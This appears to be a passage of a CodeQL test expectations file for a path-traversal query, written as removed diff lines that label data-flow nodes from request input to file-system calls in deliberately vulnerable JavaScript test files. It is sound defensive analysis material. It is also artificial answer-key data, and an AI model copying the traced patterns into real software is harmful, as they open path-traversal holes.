/g, '') | -| TaintedPath.js:163:29:163:32 | path | semmle.label | path | -| TaintedPath.js:163:29:163:57 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | -| TaintedPath.js:178:29:178:73 | "prefix ... +/, '') | semmle.label | "prefix ... +/, '') | -| TaintedPath.js:178:40:178:43 | path | semmle.label | path | -| TaintedPath.js:178:40:178:73 | path.re ... +/, '') | semmle.label | path.re ... +/, '') | -| TaintedPath.js:179:29:179:54 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| TaintedPath.js:179:29:179:84 | pathMod ... +/, '') | semmle.label | pathMod ... +/, '') | -| TaintedPath.js:179:50:179:53 | path | semmle.label | path | -| TaintedPath.js:187:29:187:45 | qs.parse(req.url) | semmle.label | qs.parse(req.url) | -| TaintedPath.js:187:29:187:49 | qs.pars ... rl).foo | semmle.label | qs.pars ... rl).foo | -| TaintedPath.js:187:38:187:44 | req.url | semmle.label | req.url | -| TaintedPath.js:188:29:188:59 | qs.pars ... q.url)) | semmle.label | qs.pars ... q.url)) | -| TaintedPath.js:188:29:188:63 | qs.pars ... l)).foo | semmle.label | qs.pars ... l)).foo | -| TaintedPath.js:188:38:188:58 | normali ... eq.url) | semmle.label | normali ... eq.url) | -| TaintedPath.js:188:51:188:57 | req.url | semmle.label | req.url | -| TaintedPath.js:190:29:190:51 | parseqs ... eq.url) | semmle.label | parseqs ... eq.url) | -| TaintedPath.js:190:29:190:55 | parseqs ... rl).foo | semmle.label | parseqs ... rl).foo | -| TaintedPath.js:190:44:190:50 | req.url | semmle.label | req.url | -| TaintedPath.js:195:7:195:48 | path | semmle.label | path | -| TaintedPath.js:195:14:195:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:195:14:195:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:195:14:195:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:195:24:195:30 | req.url | semmle.label | req.url | -| TaintedPath.js:196:31:196:34 | path | semmle.label | path | -| TaintedPath.js:197:45:197:48 | path | semmle.label | path | -| TaintedPath.js:198:35:198:38 | path | semmle.label | path | -| TaintedPath.js:202:7:202:48 | path | semmle.label | path | -| TaintedPath.js:202:14:202:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:202:14:202:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:202:14:202:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:202:24:202:30 | req.url | semmle.label | req.url | -| TaintedPath.js:206:29:206:32 | path | semmle.label | path | -| TaintedPath.js:206:29:206:85 | path.re ... '), '') | semmle.label | path.re ... '), '') | -| TaintedPath.js:211:7:211:48 | path | semmle.label | path | -| TaintedPath.js:211:14:211:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:211:14:211:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:211:14:211:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:211:24:211:30 | req.url | semmle.label | req.url | -| TaintedPath.js:213:29:213:32 | path | semmle.label | path | -| TaintedPath.js:213:29:213:68 | path.re ... '), '') | semmle.label | path.re ... '), '') | -| TaintedPath.js:216:31:216:34 | path | semmle.label | path | -| TaintedPath.js:216:31:216:69 | path.re ... '), '') | semmle.label | path.re ... '), '') | -| examples/TaintedPath.js:8:7:8:52 | filePath | semmle.label | filePath | -| examples/TaintedPath.js:8:18:8:41 | url.par ... , true) | semmle.label | url.par ... , true) | -| examples/TaintedPath.js:8:18:8:47 | url.par ... ).query | semmle.label | url.par ... ).query | -| examples/TaintedPath.js:8:18:8:52 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| examples/TaintedPath.js:8:28:8:34 | req.url | semmle.label | req.url | -| examples/TaintedPath.js:11:29:11:43 | ROOT + filePath | semmle.label | ROOT + filePath | -| examples/TaintedPath.js:11:36:11:43 | filePath | semmle.label | filePath | -| express.js:8:20:8:32 | req.query.bar | semmle.label | req.query.bar | -| handlebars.js:10:51:10:58 | filePath | semmle.label | filePath | -| handlebars.js:11:32:11:39 | filePath | semmle.label | filePath | -| handlebars.js:13:73:13:80 | filePath | semmle.label | filePath | -| handlebars.js:15:25:15:32 | filePath | semmle.label | filePath | -| handlebars.js:29:46:29:60 | req.params.path | semmle.label | req.params.path | -| handlebars.js:43:15:43:29 | req.params.path | semmle.label | req.params.path | -| normalizedPaths.js:11:7:11:27 | path | semmle.label | path | -| normalizedPaths.js:11:14:11:27 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:13:19:13:22 | path | semmle.label | path | -| normalizedPaths.js:14:19:14:29 | './' + path | semmle.label | './' + path | -| normalizedPaths.js:14:26:14:29 | path | semmle.label | path | -| normalizedPaths.js:15:19:15:22 | path | semmle.label | path | -| normalizedPaths.js:15:19:15:38 | path + '/index.html' | semmle.label | path + '/index.html' | -| normalizedPaths.js:16:19:16:53 | pathMod ... .html') | semmle.label | pathMod ... .html') | -| normalizedPaths.js:16:35:16:38 | path | semmle.label | path | -| normalizedPaths.js:17:19:17:57 | pathMod ... , path) | semmle.label | pathMod ... , path) | -| normalizedPaths.js:17:53:17:56 | path | semmle.label | path | -| normalizedPaths.js:21:7:21:49 | path | semmle.label | path | -| normalizedPaths.js:21:14:21:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:21:35:21:48 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:23:19:23:22 | path | semmle.label | path | -| normalizedPaths.js:24:19:24:29 | './' + path | semmle.label | './' + path | -| normalizedPaths.js:24:26:24:29 | path | semmle.label | path | -| normalizedPaths.js:25:19:25:22 | path | semmle.label | path | -| normalizedPaths.js:25:19:25:38 | path + '/index.html' | semmle.label | path + '/index.html' | -| normalizedPaths.js:26:19:26:53 | pathMod ... .html') | semmle.label | pathMod ... .html') | -| normalizedPaths.js:26:35:26:38 | path | semmle.label | path | -| normalizedPaths.js:27:19:27:57 | pathMod ... , path) | semmle.label | pathMod ... , path) | -| normalizedPaths.js:27:53:27:56 | path | semmle.label | path | -| normalizedPaths.js:31:7:31:49 | path | semmle.label | path | -| normalizedPaths.js:31:14:31:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:31:35:31:48 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:36:19:36:22 | path | semmle.label | path | -| normalizedPaths.js:41:21:41:24 | path | semmle.label | path | -| normalizedPaths.js:54:7:54:49 | path | semmle.label | path | -| normalizedPaths.js:54:14:54:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:54:35:54:48 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:59:19:59:22 | path | semmle.label | path | -| normalizedPaths.js:63:19:63:22 | path | semmle.label | path | -| normalizedPaths.js:63:19:63:38 | path + "/index.html" | semmle.label | path + "/index.html" | -| normalizedPaths.js:68:21:68:24 | path | semmle.label | path | -| normalizedPaths.js:73:7:73:56 | path | semmle.label | path | -| normalizedPaths.js:73:14:73:56 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:73:35:73:55 | './' + ... ry.path | semmle.label | './' + ... ry.path | -| normalizedPaths.js:73:42:73:55 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:78:22:78:25 | path | semmle.label | path | -| normalizedPaths.js:82:7:82:27 | path | semmle.label | path | -| normalizedPaths.js:82:14:82:27 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:87:29:87:32 | path | semmle.label | path | -| normalizedPaths.js:90:31:90:34 | path | semmle.label | path | -| normalizedPaths.js:94:7:94:49 | path | semmle.label | path | -| normalizedPaths.js:94:14:94:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:94:35:94:48 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:99:29:99:32 | path | semmle.label | path | -| normalizedPaths.js:117:7:117:44 | path | semmle.label | path | -| normalizedPaths.js:117:14:117:44 | fs.real ... y.path) | semmle.label | fs.real ... y.path) | -| normalizedPaths.js:117:30:117:43 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:119:19:119:22 | path | semmle.label | path | -| normalizedPaths.js:120:19:120:53 | pathMod ... .html') | semmle.label | pathMod ... .html') | -| normalizedPaths.js:120:35:120:38 | path | semmle.label | path | -| normalizedPaths.js:130:7:130:49 | path | semmle.label | path | -| normalizedPaths.js:130:14:130:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:130:35:130:48 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:135:21:135:24 | path | semmle.label | path | -| normalizedPaths.js:139:7:139:62 | path | semmle.label | path | -| normalizedPaths.js:139:14:139:62 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:139:48:139:61 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:144:21:144:24 | path | semmle.label | path | -| normalizedPaths.js:148:7:148:58 | path | semmle.label | path | -| normalizedPaths.js:148:14:148:58 | 'foo/' ... y.path) | semmle.label | 'foo/' ... y.path) | -| normalizedPaths.js:148:23:148:58 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:148:44:148:57 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:151:21:151:24 | path | semmle.label | path | -| normalizedPaths.js:153:21:153:24 | path | semmle.label | path | -| normalizedPaths.js:160:7:160:49 | path | semmle.label | path | -| normalizedPaths.js:160:14:160:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:160:35:160:48 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:165:19:165:22 | path | semmle.label | path | -| normalizedPaths.js:170:21:170:24 | path | semmle.label | path | -| normalizedPaths.js:174:7:174:27 | path | semmle.label | path | -| normalizedPaths.js:174:14:174:27 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:184:19:184:22 | path | semmle.label | path | -| normalizedPaths.js:187:21:187:24 | path | semmle.label | path | -| normalizedPaths.js:189:21:189:24 | path | semmle.label | path | -| normalizedPaths.js:192:21:192:24 | path | semmle.label | path | -| normalizedPaths.js:194:21:194:24 | path | semmle.label | path | -| normalizedPaths.js:199:21:199:24 | path | semmle.label | path | -| normalizedPaths.js:201:7:201:49 | normalizedPath | semmle.label | normalizedPath | -| normalizedPaths.js:201:24:201:49 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| normalizedPaths.js:201:45:201:48 | path | semmle.label | path | -| normalizedPaths.js:205:21:205:34 | normalizedPath | semmle.label | normalizedPath | -| normalizedPaths.js:208:21:208:34 | normalizedPath | semmle.label | normalizedPath | -| normalizedPaths.js:210:21:210:34 | normalizedPath | semmle.label | normalizedPath | -| normalizedPaths.js:214:7:214:49 | path | semmle.label | path | -| normalizedPaths.js:214:14:214:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:214:35:214:48 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:219:3:219:33 | path | semmle.label | path | -| normalizedPaths.js:219:10:219:33 | decodeU ... t(path) | semmle.label | decodeU ... t(path) | -| normalizedPaths.js:219:29:219:32 | path | semmle.label | path | -| normalizedPaths.js:222:21:222:24 | path | semmle.label | path | -| normalizedPaths.js:226:7:226:70 | path | semmle.label | path | -| normalizedPaths.js:226:14:226:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:226:14:226:70 | pathMod ... g, ' ') | semmle.label | pathMod ... g, ' ') | -| normalizedPaths.js:226:35:226:48 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:228:21:228:24 | path | semmle.label | path | -| normalizedPaths.js:236:7:236:47 | path | semmle.label | path | -| normalizedPaths.js:236:14:236:47 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:236:33:236:46 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:238:19:238:22 | path | semmle.label | path | -| normalizedPaths.js:245:21:245:24 | path | semmle.label | path | -| normalizedPaths.js:250:21:250:24 | path | semmle.label | path | -| normalizedPaths.js:254:7:254:47 | path | semmle.label | path | -| normalizedPaths.js:254:14:254:47 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:254:33:254:46 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:256:19:256:22 | path | semmle.label | path | -| normalizedPaths.js:262:21:262:24 | path | semmle.label | path | -| normalizedPaths.js:267:7:267:42 | newpath | semmle.label | newpath | -| normalizedPaths.js:267:17:267:42 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| normalizedPaths.js:267:38:267:41 | path | semmle.label | path | -| normalizedPaths.js:270:21:270:27 | newpath | semmle.label | newpath | -| normalizedPaths.js:275:7:275:42 | newpath | semmle.label | newpath | -| normalizedPaths.js:275:17:275:42 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| normalizedPaths.js:275:38:275:41 | path | semmle.label | path | -| normalizedPaths.js:278:21:278:27 | newpath | semmle.label | newpath | -| normalizedPaths.js:283:7:283:42 | newpath | semmle.label | newpath | -| normalizedPaths.js:283:17:283:42 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| normalizedPaths.js:283:38:283:41 | path | semmle.label | path | -| normalizedPaths.js:286:21:286:27 | newpath | semmle.label | newpath | -| normalizedPaths.js:291:7:291:42 | newpath | semmle.label | newpath | -| normalizedPaths.js:291:17:291:42 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| normalizedPaths.js:291:38:291:41 | path | semmle.label | path | -| normalizedPaths.js:296:21:296:27 | newpath | semmle.label | newpath | -| normalizedPaths.js:303:6:303:26 | path | semmle.label | path | -| normalizedPaths.js:303:13:303:26 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:304:18:304:21 | path | semmle.label | path | -| normalizedPaths.js:309:19:309:22 | path | semmle.label | path | -| normalizedPaths.js:313:19:313:22 | path | semmle.label | path | -| normalizedPaths.js:316:19:316:22 | path | semmle.label | path | -| normalizedPaths.js:320:6:320:49 | normalizedPath | semmle.label | normalizedPath | -| normalizedPaths.js:320:23:320:49 | pathMod ... , path) | semmle.label | pathMod ... , path) | -| normalizedPaths.js:320:45:320:48 | path | semmle.label | path | -| normalizedPaths.js:325:19:325:32 | normalizedPath | semmle.label | normalizedPath | -| normalizedPaths.js:332:19:332:32 | normalizedPath | semmle.label | normalizedPath | -| normalizedPaths.js:339:6:339:46 | path | semmle.label | path | -| normalizedPaths.js:339:13:339:46 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:339:32:339:45 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:341:18:341:21 | path | semmle.label | path | -| normalizedPaths.js:346:19:346:22 | path | semmle.label | path | -| normalizedPaths.js:354:7:354:27 | path | semmle.label | path | -| normalizedPaths.js:354:14:354:27 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:356:19:356:22 | path | semmle.label | path | -| normalizedPaths.js:358:7:358:51 | requestPath | semmle.label | requestPath | -| normalizedPaths.js:358:21:358:51 | pathMod ... , path) | semmle.label | pathMod ... , path) | -| normalizedPaths.js:358:47:358:50 | path | semmle.label | path | -| normalizedPaths.js:363:21:363:31 | requestPath | semmle.label | requestPath | -| normalizedPaths.js:377:7:377:27 | path | semmle.label | path | -| normalizedPaths.js:377:14:377:27 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:379:19:379:22 | path | semmle.label | path | -| normalizedPaths.js:381:19:381:29 | slash(path) | semmle.label | slash(path) | -| normalizedPaths.js:381:25:381:28 | path | semmle.label | path | -| normalizedPaths.js:385:7:385:46 | path | semmle.label | path | -| normalizedPaths.js:385:14:385:46 | pathMod ... uery.x) | semmle.label | pathMod ... uery.x) | -| normalizedPaths.js:385:35:385:45 | req.query.x | semmle.label | req.query.x | -| normalizedPaths.js:388:19:388:22 | path | semmle.label | path | -| normalizedPaths.js:399:21:399:24 | path | semmle.label | path | -| normalizedPaths.js:407:19:407:67 | pathMod ... t('/')) | semmle.label | pathMod ... t('/')) | -| normalizedPaths.js:407:45:407:55 | req.query.x | semmle.label | req.query.x | -| normalizedPaths.js:407:45:407:66 | req.que ... it('/') | semmle.label | req.que ... it('/') | -| normalizedPaths.js:408:19:408:60 | pathMod ... t('/')) | semmle.label | pathMod ... t('/')) | -| normalizedPaths.js:408:38:408:48 | req.query.x | semmle.label | req.query.x | -| normalizedPaths.js:408:38:408:59 | req.que ... it('/') | semmle.label | req.que ... it('/') | -| normalizedPaths.js:412:7:412:46 | path | semmle.label | path | -| normalizedPaths.js:412:14:412:46 | pathMod ... uery.x) | semmle.label | pathMod ... uery.x) | -| normalizedPaths.js:412:35:412:45 | req.query.x | semmle.label | req.query.x | -| normalizedPaths.js:415:19:415:22 | path | semmle.label | path | -| normalizedPaths.js:426:21:426:24 | path | semmle.label | path | -| other-fs-libraries.js:9:7:9:48 | path | semmle.label | path | -| other-fs-libraries.js:9:14:9:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| other-fs-libraries.js:9:14:9:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| other-fs-libraries.js:9:14:9:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| other-fs-libraries.js:9:24:9:30 | req.url | semmle.label | req.url | -| other-fs-libraries.js:11:19:11:22 | path | semmle.label | path | -| other-fs-libraries.js:12:27:12:30 | path | semmle.label | path | -| other-fs-libraries.js:13:24:13:27 | path | semmle.label | path | -| other-fs-libraries.js:14:27:14:30 | path | semmle.label | path | -| other-fs-libraries.js:16:34:16:37 | path | semmle.label | path | -| other-fs-libraries.js:17:35:17:38 | path | semmle.label | path | -| other-fs-libraries.js:19:56:19:59 | path | semmle.label | path | -| other-fs-libraries.js:24:35:24:38 | path | semmle.label | path | -| other-fs-libraries.js:38:7:38:48 | path | semmle.label | path | -| other-fs-libraries.js:38:14:38:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| other-fs-libraries.js:38:14:38:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| other-fs-libraries.js:38:14:38:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| other-fs-libraries.js:38:24:38:30 | req.url | semmle.label | req.url | -| other-fs-libraries.js:40:35:40:38 | path | semmle.label | path | -| other-fs-libraries.js:41:50:41:53 | path | semmle.label | path | -| other-fs-libraries.js:42:53:42:56 | path | semmle.label | path | -| other-fs-libraries.js:49:7:49:48 | path | semmle.label | path | -| other-fs-libraries.js:49:14:49:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| other-fs-libraries.js:49:14:49:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| other-fs-libraries.js:49:14:49:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| other-fs-libraries.js:49:24:49:30 | req.url | semmle.label | req.url | -| other-fs-libraries.js:51:19:51:22 | path | semmle.label | path | -| other-fs-libraries.js:52:24:52:27 | path | semmle.label | path | -| other-fs-libraries.js:54:36:54:39 | path | semmle.label | path | -| other-fs-libraries.js:55:36:55:39 | path | semmle.label | path | -| other-fs-libraries.js:57:46:57:49 | path | semmle.label | path | -| other-fs-libraries.js:59:39:59:42 | path | semmle.label | path | -| other-fs-libraries.js:62:43:62:46 | path | semmle.label | path | -| other-fs-libraries.js:63:51:63:54 | path | semmle.label | path | -| other-fs-libraries.js:68:7:68:48 | path | semmle.label | path | -| other-fs-libraries.js:68:14:68:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| other-fs-libraries.js:68:14:68:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| other-fs-libraries.js:68:14:68:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| other-fs-libraries.js:68:24:68:30 | req.url | semmle.label | req.url | -| other-fs-libraries.js:70:19:70:22 | path | semmle.label | path | -| other-fs-libraries.js:71:10:71:13 | path | semmle.label | path | -| other-fs-libraries.js:72:15:72:18 | path | semmle.label | path | -| other-fs-libraries.js:73:8:73:11 | path | semmle.label | path | -| other-fs-libraries.js:75:15:75:15 | x | semmle.label | x | -| other-fs-libraries.js:76:19:76:19 | x | semmle.label | x | -| other-fs-libraries.js:81:7:81:48 | path | semmle.label | path | -| other-fs-libraries.js:81:14:81:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| other-fs-libraries.js:81:14:81:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| other-fs-libraries.js:81:14:81:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| other-fs-libraries.js:81:24:81:30 | req.url | semmle.label | req.url | -| other-fs-libraries.js:83:16:83:19 | path | semmle.label | path | -| prettier.js:6:11:6:28 | p | semmle.label | p | -| prettier.js:6:13:6:13 | p | semmle.label | p | -| prettier.js:7:28:7:28 | p | semmle.label | p | -| prettier.js:11:44:11:44 | p | semmle.label | p | -| pupeteer.js:5:9:5:71 | tainted | semmle.label | tainted | -| pupeteer.js:5:19:5:71 | "dir/" ... t.data" | semmle.label | "dir/" ... t.data" | -| pupeteer.js:5:28:5:53 | parseTo ... t).name | semmle.label | parseTo ... t).name | -| pupeteer.js:9:28:9:34 | tainted | semmle.label | tainted | -| pupeteer.js:13:37:13:43 | tainted | semmle.label | tainted | -| sharedlib-repro.js:13:22:13:43 | req.par ... spaceId | semmle.label | req.par ... spaceId | -| sharedlib-repro.js:21:27:21:34 | filepath | semmle.label | filepath | -| sharedlib-repro.js:22:18:22:25 | filepath | semmle.label | filepath | -| tainted-access-paths.js:6:7:6:48 | path | semmle.label | path | -| tainted-access-paths.js:6:14:6:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| tainted-access-paths.js:6:14:6:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| tainted-access-paths.js:6:14:6:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| tainted-access-paths.js:6:24:6:30 | req.url | semmle.label | req.url | -| tainted-access-paths.js:8:19:8:22 | path | semmle.label | path | -| tainted-access-paths.js:10:7:10:36 | obj | semmle.label | obj | -| tainted-access-paths.js:10:33:10:36 | path | semmle.label | path | -| tainted-access-paths.js:12:19:12:21 | obj | semmle.label | obj | -| tainted-access-paths.js:12:19:12:25 | obj.sub | semmle.label | obj.sub | -| tainted-access-paths.js:26:19:26:21 | obj | semmle.label | obj | -| tainted-access-paths.js:26:19:26:26 | obj.sub3 | semmle.label | obj.sub3 | -| tainted-access-paths.js:29:21:29:23 | obj | semmle.label | obj | -| tainted-access-paths.js:29:21:29:28 | obj.sub4 | semmle.label | obj.sub4 | -| tainted-access-paths.js:30:23:30:25 | obj | semmle.label | obj | -| tainted-access-paths.js:30:23:30:30 | obj.sub4 | semmle.label | obj.sub4 | -| tainted-access-paths.js:31:23:31:25 | obj | semmle.label | obj | -| tainted-access-paths.js:31:23:31:30 | obj.sub4 | semmle.label | obj.sub4 | -| tainted-access-paths.js:39:7:39:48 | path | semmle.label | path | -| tainted-access-paths.js:39:14:39:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| tainted-access-paths.js:39:14:39:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| tainted-access-paths.js:39:14:39:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| tainted-access-paths.js:39:24:39:30 | req.url | semmle.label | req.url | -| tainted-access-paths.js:40:23:40:26 | path | semmle.label | path | -| tainted-access-paths.js:48:7:48:48 | path | semmle.label | path | -| tainted-access-paths.js:48:14:48:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| tainted-access-paths.js:48:14:48:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| tainted-access-paths.js:48:14:48:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| tainted-access-paths.js:48:24:48:30 | req.url | semmle.label | req.url | -| tainted-access-paths.js:49:10:49:13 | path | semmle.label | path | -| tainted-promise-steps.js:6:7:6:48 | path | semmle.label | path | -| tainted-promise-steps.js:6:14:6:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| tainted-promise-steps.js:6:14:6:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| tainted-promise-steps.js:6:14:6:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| tainted-promise-steps.js:6:24:6:30 | req.url | semmle.label | req.url | -| tainted-promise-steps.js:7:10:7:30 | Promise ... e(path) [PromiseValue] | semmle.label | Promise ... e(path) [PromiseValue] | -| tainted-promise-steps.js:7:26:7:29 | path | semmle.label | path | -| tainted-promise-steps.js:10:23:10:33 | pathPromise [PromiseValue] | semmle.label | pathPromise [PromiseValue] | -| tainted-promise-steps.js:11:19:11:35 | await pathPromise | semmle.label | await pathPromise | -| tainted-promise-steps.js:11:25:11:35 | pathPromise [PromiseValue] | semmle.label | pathPromise [PromiseValue] | -| tainted-promise-steps.js:12:3:12:13 | pathPromise [PromiseValue] | semmle.label | pathPromise [PromiseValue] | -| tainted-promise-steps.js:12:20:12:23 | path | semmle.label | path | -| tainted-promise-steps.js:12:44:12:47 | path | semmle.label | path | -| tainted-require.js:7:19:7:37 | req.param("module") | semmle.label | req.param("module") | -| tainted-require.js:12:29:12:47 | req.param("module") | semmle.label | req.param("module") | -| tainted-require.js:14:11:14:29 | req.param("module") | semmle.label | req.param("module") | -| tainted-sendFile.js:8:16:8:33 | req.param("gimme") | semmle.label | req.param("gimme") | -| tainted-sendFile.js:10:16:10:33 | req.param("gimme") | semmle.label | req.param("gimme") | -| tainted-sendFile.js:18:43:18:58 | req.param("dir") | semmle.label | req.param("dir") | -| tainted-sendFile.js:24:16:24:49 | path.re ... rams.x) | semmle.label | path.re ... rams.x) | -| tainted-sendFile.js:24:37:24:48 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:25:16:25:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | -| tainted-sendFile.js:25:34:25:45 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:30:16:30:33 | req.param("gimme") | semmle.label | req.param("gimme") | -| tainted-sendFile.js:33:16:33:48 | homeDir ... arams.x | semmle.label | homeDir ... arams.x | -| tainted-sendFile.js:33:37:33:48 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:35:16:35:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | -| tainted-sendFile.js:35:34:35:45 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:38:43:38:58 | req.param("dir") | semmle.label | req.param("dir") | -| tainted-string-steps.js:6:7:6:48 | path | semmle.label | path | -| tainted-string-steps.js:6:14:6:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| tainted-string-steps.js:6:14:6:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| tainted-string-steps.js:6:14:6:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| tainted-string-steps.js:6:24:6:30 | req.url | semmle.label | req.url | -| tainted-string-steps.js:8:18:8:21 | path | semmle.label | path | -| tainted-string-steps.js:8:18:8:34 | path.substring(4) | semmle.label | path.substring(4) | -| tainted-string-steps.js:9:18:9:21 | path | semmle.label | path | -| tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | semmle.label | path.substring(0, i) | -| tainted-string-steps.js:10:18:10:21 | path | semmle.label | path | -| tainted-string-steps.js:10:18:10:31 | path.substr(4) | semmle.label | path.substr(4) | -| tainted-string-steps.js:11:18:11:21 | path | semmle.label | path | -| tainted-string-steps.js:11:18:11:30 | path.slice(4) | semmle.label | path.slice(4) | -| tainted-string-steps.js:13:18:13:21 | path | semmle.label | path | -| tainted-string-steps.js:13:18:13:37 | path.concat(unknown) | semmle.label | path.concat(unknown) | -| tainted-string-steps.js:14:18:14:37 | unknown.concat(path) | semmle.label | unknown.concat(path) | -| tainted-string-steps.js:14:33:14:36 | path | semmle.label | path | -| tainted-string-steps.js:15:18:15:46 | unknown ... , path) | semmle.label | unknown ... , path) | -| tainted-string-steps.js:15:42:15:45 | path | semmle.label | path | -| tainted-string-steps.js:17:18:17:21 | path | semmle.label | path | -| tainted-string-steps.js:17:18:17:28 | path.trim() | semmle.label | path.trim() | -| tainted-string-steps.js:18:18:18:21 | path | semmle.label | path | -| tainted-string-steps.js:18:18:18:35 | path.toLowerCase() | semmle.label | path.toLowerCase() | -| tainted-string-steps.js:22:18:22:21 | path | semmle.label | path | -| tainted-string-steps.js:22:18:22:32 | path.split('/') | semmle.label | path.split('/') | -| tainted-string-steps.js:22:18:22:35 | path.split('/')[i] | semmle.label | path.split('/')[i] | -| tainted-string-steps.js:23:18:23:21 | path | semmle.label | path | -| tainted-string-steps.js:23:18:23:33 | path.split(/\\//) | semmle.label | path.split(/\\//) | -| tainted-string-steps.js:23:18:23:36 | path.split(/\\//)[i] | semmle.label | path.split(/\\//)[i] | -| tainted-string-steps.js:24:18:24:21 | path | semmle.label | path | -| tainted-string-steps.js:24:18:24:32 | path.split("?") | semmle.label | path.split("?") | -| tainted-string-steps.js:24:18:24:35 | path.split("?")[0] | semmle.label | path.split("?")[0] | -| tainted-string-steps.js:26:18:26:21 | path | semmle.label | path | -| tainted-string-steps.js:26:18:26:36 | path.split(unknown) | semmle.label | path.split(unknown) | -| tainted-string-steps.js:26:18:26:45 | path.sp ... hatever | semmle.label | path.sp ... hatever | -| tainted-string-steps.js:27:18:27:21 | path | semmle.label | path | -| tainted-string-steps.js:27:18:27:36 | path.split(unknown) | semmle.label | path.split(unknown) | -| torrents.js:5:6:5:38 | name | semmle.label | name | -| torrents.js:5:13:5:38 | parseTo ... t).name | semmle.label | parseTo ... t).name | -| torrents.js:6:6:6:45 | loc | semmle.label | loc | -| torrents.js:6:12:6:45 | dir + " ... t.data" | semmle.label | dir + " ... t.data" | -| torrents.js:6:24:6:27 | name | semmle.label | name | -| torrents.js:7:25:7:27 | loc | semmle.label | loc | 